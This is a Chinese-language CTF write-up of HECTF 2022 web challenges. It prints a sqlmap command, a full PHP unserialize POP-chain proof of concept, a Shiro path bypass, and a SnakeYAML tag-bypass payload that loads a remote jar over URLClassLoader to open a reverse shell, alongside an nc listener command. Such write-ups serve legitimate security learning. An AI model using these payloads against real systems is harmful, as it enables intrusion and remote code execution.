[HECTF 2022]—Web WirteUp
文章目录
- 迷路的小狮
- 擎天注
- easy_unserialize
- littleJava
-
- shiro权限绕过
- snakeYaml反序列化
- easyJava
- newphp
- 后记
迷路的小狮
从头到尾凭猜,凭感觉。。。
- 访问/hebnu
- 切换为POST请求
- 将referer 改为 河北师范的官网地址
- 修改xff为127.0.0.1
- 得到jsfuck解码
![[HECTF 2022]—Web WirteUp_第1张图片](http://img.e-com-net.com/image/info8/fc1ae3c3e52d4347aa3bbadbc81264eb.jpg)
擎天注
没做这道题贴一个社团公众号的wp
python3 sqlmap.py -u http://url/?id=1 --dbs -batch
![[HECTF 2022]—Web WirteUp_第2张图片](http://img.e-com-net.com/image/info8/45e44da7246e4f3da32d5108d3727c8b.jpg)
flag 在 ctf 库下的 3eDf4f07efC9ee16 表下 flag
![[HECTF 2022]—Web WirteUp_第3张图片](http://img.e-com-net.com/image/info8/62f6b6b2473a4688aeae7f1b8941caf7.jpg)
easy_unserialize
一直在想怎么绕wakeup,后来才发现有一个__issert()魔法方法开始没注意到
error_reporting(0);
class A{
public $file;
public function __construct(){
echo "Welcome to HECTF Have fun!!!
";
}
public function __wakeup(){
if(isset($this->file->var)){
$this->file = "flag.php";
}
else{
$this->file = "index.php";
}
}
public function __destruct(){
highlight_file($this->file);
}
}
class B{
public $str;
public $huang;
public function __isset($arg)
{
echo "难道我真的要失败了,吗".$this->str;
}
public function __call($fun1,$arg)
{
return $this->huang->str;
}
}
class C{
public $eee;
public $aaa="who are you?";
public $ccc;
public function __toString()
{
$this->eee->flag();
}
public function __get($css)
{
$function = $this->ccc;
return $function();
}
}
class D{
private $ddd;
private $ext;
public function flag(){
$this->ext->nisa($this->ddd);
}
public function __invoke()
{
echo new $this->ddd($this->ext);
}
}
$gagaga = new A();
unserialize(serialize($gagaga));
$data = $_POST['data'];
unserialize($data);
unserialize会调用A.__wakeup() ,wakeup里有isset,会调用B.__isset会执行echo,调用C.__toString会调用flag(),flag()方法不存在会调用B.__call,retrun str属性 属性不存在调用C.__get(),function()类当做方法使用会调用__invoke()
__invoke()里边 是echo new a ( a( a(b)的形式 ,可以触发反序列化原生类,具体可参考之前写的:PHP反序列化原生类利用
POC:
<?php
class A{
public $file;
}
class B{
public $str;
public $huang;
}
class C{
public $eee;
public $aaa;
public $ccc;
}
class D{
public $ddd;
public $ext;
}
$gagaga = new A();
$gagaga->file=new B();
$gagaga->file->str =new C();
$gagaga->file-> str -> eee = new B();
$gagaga->file-> str -> eee -> huang = new C();
$gagaga->file-> str -> eee -> huang ->ccc = new D();
$gagaga->file-> str -> eee -> huang ->ccc ->ddd ="SplFileObject";
$gagaga->file-> str -> eee -> huang ->ccc ->ext ="php://filter/read=convert.base64-encode/resource=../../../ffflllllaaaaaaggggg.txt";
echo serialize($gagaga);
注:
$ddd和$ext属性是私有的所以链子构造好后需要在前边加上%00D%00,并且长度+3,其次flag分成了两行SplFileObject直接读不出来,需要用伪协议的方式读取
littleJava
本地打通了,但不知道为什么当时题目环境不出网,还以为要写内存马,写了半天也没打通,最后看了WP原来是出网的,也不知道反弹shell时候哪里出了问题。。。。。
shiro权限绕过
题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可
![[HECTF 2022]—Web WirteUp_第4张图片](http://img.e-com-net.com/image/info8/a0f80c3f732942099ac79699bf5bc688.jpg)
snakeYaml反序列化
请求/admin/hello/后就能通过data进行yaml反序列化
@RequestMapping({"/admin/hello"})
@ResponseBody
public String admin(@RequestParam(name = "data",required = false) String data, Model model) throws Exception {
try {
if (data.startsWith("!!")) {
return "Hacker!!!";
} else {
Yaml yaml = new Yaml();
yaml.load(data);
return "Good Yaml";
}
} catch (Exception var4) {
return "Give me one data!";
}
}
可以直接用现成项目,构造反弹shell命令
![[HECTF 2022]—Web WirteUp_第5张图片](http://img.e-com-net.com/image/info8/87be24e136854192b1d7478e99b3edce.jpg)
生成对应jar包
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
将生成的yaml-payload.jar,放到vps上,并监听反弹shell端口
nc -lvnp 10000
最后是构造反序列化,由于上边过滤了!!,因此需要bypass
!<tag:yaml.org,2002:javax.script.ScriptEngineManager>
[!<tag:yaml.org,2002:java.net.URLClassLoader>
[[!<tag:yaml.org,2002:java.net.URL>
["http://ip/yaml-payload.jar"]]]]
成功反弹shell
![[HECTF 2022]—Web WirteUp_第6张图片](http://img.e-com-net.com/image/info8/157c8ef7409242a3b68040639bd1812a.jpg)
easyJava
题目提示CC、CB、C3P0…
没有给jar包只是一个没有过滤的反序列化:
package com.butler.easyjava.MyController;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;
@Controller
public class HelloController {
@RequestMapping({"/"})
@ResponseBody
public String index(@RequestParam(name = "data", required = false) String data) throws Exception {
try{
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Base64.getDecoder().decode(data));
ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
objectInputStream.readObject();
System.out.println(data);
return "Success";
} catch (Exception e){
return "Please Post RequestParam data=";
}
}
}
尝试了下CC没打通,寻思可能内部有啥waf就没打,结果用无CC依赖CB就能直接打通。下次再有一定要都试试!!!!
newphp
和以往php原生类利用不同没有echo,不过能直接搜到利用方式
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b
- https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
后记
剩下的是phar、pickle反序列化,没环境不打了